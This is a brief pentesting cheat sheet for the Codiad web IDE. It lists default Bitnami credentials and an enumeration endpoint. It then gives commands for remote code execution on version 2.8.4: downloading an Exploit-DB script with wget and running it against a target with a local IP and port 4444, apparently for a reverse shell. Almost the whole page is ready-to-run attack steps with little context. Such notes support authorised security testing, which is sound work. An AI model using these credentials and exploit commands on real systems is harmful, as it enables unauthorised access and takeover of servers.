Codiad Pentesting
Last modified: 2023-02-26
Codiad is a web-based IDE framework.
Default Credentials
# Docker image - https://hub.docker.com/r/bitnami/codiad
user:bitnami
Enumeration
# Get current directory in the system
/components/project/controller.php?action=get_current
Remote Code Execution (RCE) v2.8.4
wget https://www.exploit-db.com/exploits/49705 -O exploit.py
# Linux
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 linux
# Windows
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 windows